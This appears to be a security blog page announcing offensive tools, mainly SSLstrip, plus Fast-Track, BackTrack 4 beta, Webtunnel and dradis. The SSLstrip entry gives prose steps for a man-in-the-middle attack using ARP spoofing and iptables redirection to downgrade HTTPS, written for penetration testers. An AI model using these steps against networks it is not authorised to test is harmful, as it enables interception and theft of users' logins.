SSLstrip – HTTPS Stripping Attack Tool

This tool provides a demonstration of the HTTPS stripping attacks that was presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. For more information on the attack, see the video from the presentation on the homepage.

To get this running:

  • Flip your machine into forwarding mode.
  • Setup iptables to redirect HTTP traffic to sslstrip.
  • Run sslstrip.
  • Run arpspoof to convince a network they should send their traffic to you.

That should do it.

How does this work?

First, arpspoof convinces a host that our MAC address is the router’s MAC address, and the target begins to send us all its network traffic. The kernel forwards everything along except for traffic destined to port 80, which it redirects to $listenPort (10000, for example).

At this point, sslstrip receives the traffic and does its magic.

You can download sslstrip 0.2 here:

sslstrip-0.2.tar.gz

Or read more here.

Labels: ,

Fast-Track 4.0 – Automated Penetration Testing Suite

The latest big buzz is Fast-Track released recently at ShmooCon by Securestate, basically Fast-Track is an automated penetration suite for penetration testers.

For those of you new to Fast-Track, Fast-Track is a python based open-source project aimed at helping Penetration Testers in an effort to identify, exploit, and further penetrate a network. Fast-Track was originally conceived when David Kennedy was on a penetration test and found that there was generally a lack of tools or automation in certain attacks that were normally extremely advanced and time consuming.

In an effort to reproduce some of David’s advanced attacks and propagate it down to the team at SecureState, David ended up writing Fast-Track for the public. Many of the issues Fast-Track exploits are due to improper sanitizing of client-side data within web applications, patch management, or lack of hardening techniques. All of these are relatively simple to fix if you know what to look for, but as penetration testers are extremely common findings for us.

Fast-Track arms the penetration tester with advanced attacks that in most cases have never been performed before. Sit back relax, crank open a can of jolt cola and enjoy the ride.

It’s something a lot of people will enjoy as many parts of a pen-test are very monotonous and don’t really take your full concentration, a semi-automated approach with a skillful eye watching for false-positives and false-negatives is always more effective and efficient than fully manual or fully automated testing.

Dependencies – Metasploit 3, SQLite, PYMSSQL, FreeTDS, Pexpect, ClientForms, Beautiful Soup, and Psycho.

Installation – When extracting the tarball, run the setup.py file by executing python setup.py install, this will install the needed dependencies MINUS SQLite and Metasploit 3, you should specify the metasploit path or it will default to the BackTrack 3 installation menu. Once the installation is completed, Fast-Track should be fully functional.

You can download Fast-Track 4.0 here:

fasttrack.tgz

Or read more here.

Labels: , ,

BackTrack BETA 4

The Remote Exploit Development Team is happy to announce the release of BackTrack 4 Beta. In this latest version of BackTrack 4 there have been some conceptual changed and some new and exciting features. The most significant of these changes is the expansion from the realm of a Pentesting LiveCD towards a full blown “Distribution”.

Now based on Debian core packages and utilizing the Ubuntu software repositories, BackTrack 4 can be upgraded in case of update. When syncing with the BackTrack repositories, you will regularly get security tool updates soon after they are released.

If you don’t know what BackTrack is – it’s the result of merging the two innovative penetration testing live linux distributions Auditor and Whax. Backtrack provides a thorough pentesting environment which is bootable via CD, USB or the network (PXE). The tools are arranged in an intuitive manner, and cover most of the attack vectors. Complex environments are simplified, such as automatic Kismet configuration, one click Snort setup, precompiled Metasploit lorcon modules, etc. BackTrack has been dubbed the #1 Security Live CD by Insecure.org, and #36 overall.

New Features

  • Kernel 2.6.28.1 with better hardware support.
  • Native support for Pico e12 and e16 cards is now fully functional, making BackTrack the first pentesting distro to fully utilize these awesome tiny machines.
  • Support for PXE Boot – Boot BackTrack over the network with PXE supported cards!
  • SAINT EXPLOIT – kindly provided by SAINT corporation for our users with a limited number of free IPs.
  • MALTEGO – The guys over at Paterva did outstanding work with Maltego 2.0.2 – which is featured in BackTrack as a community edition.
  • The latest mac80211 wireless injection patches are applied, with several custom patches for rtl8187 injection speed enhancements. Wireless injection support has never been so broad and functional.
  • Unicornscan – Fully functional with postgress logging support and a web front end.
  • RFID support
  • Pyrit CUDA support…
  • New and updated tools – the list is endless!

This BETA release is considered stable and usable. Some tools were kept back from this version, and will be soon added to the repositories. Some minor bugs have been discovered and will be fixed with updated packaged.

It would also be appreciated if you could use this latest release and give some feedback to the development team to improve it and ensure it works with your specific hardware config (especially the wireless features).

You can download BackTrack BETA 4 here:

DVD ISO Image – bt4-beta.iso
VMware Image – bt4-beta-vm-6.5.1.rar

Or read more here.

Labels: , ,

Webtunnel 0.0.2 – HTTP Encapsulation and Tunnel Tool

Webtunnel is a network utility that encapsulates arbitrary data in HTTP and transmits it through a web server. In that regard, it is similar to httptunnel, however, it has several key important differences: its server component runs in the context of a web server as a CGI application (with optional FastCGI support) so it does not need its own port, and supports most things that the web server supports, such as authentication, HTTP 1.1, HTTPS, and client certificates; it uses simple requests and responses so it works seamlessly through forward and reverse proxies; it is multi-threaded (actually multi-process using sockets for inter-process communication) to allow multiple parallel connections to multiple destinations simultaneously.

It’s written in Perl and currently supports the tunneling of TCP connections. Future plans include implementations in different languages, mixed tunneling of UDP and pipes (so you can tunnel directly to a shell etc.), configuration features such as access control lists, and transmission options like compression and encryption.

You can download Webtunnel 0.0.2 here:

webtunnel-0.0.2.tgz

Or read more here.

Labels: , ,

dradis v2.0 – Open Source Security Reporting Tool

This is more of a tool for the information security professional amongst us, those working in a team carrying out web application audits, penetration tests and vulnerability assessments.

It’s useful for a team to use a tool like dradis so everyone is on the same page and the progress and segregation of responsibility can easily be seen.

Basically speaking dradis is an open source tool for sharing information during security assessments. It provides a centralized repository of information to keep track of
what has been done so far, and what is still ahead.

It’s a web application using a client/server architecture with an easy to use web interface. If you still aren’t sure what that means you can view a flash demo of the application in action here.


This application is suited to people in lengthy engagements, it’s very useful to have all the information in one place. It’s also good to have if your team changes (i.e. someone joins half the way through), it will be useful to bring them up to speed.

The app is flexible, you don’t need to adapt your methodology to use it. It provides a web service interface so you can connect it with your existing vulnerability database or reporting tool.

The changelog for the latest feature can be found here.

You can download dradis v2.0 here:

One click installer for Windows – dradis-v2.0-setup.exe
Platform independant source – dradis-v2.0.0.tar.gz

Or read more here.

Labels:
Subscribe to: Posts (Atom)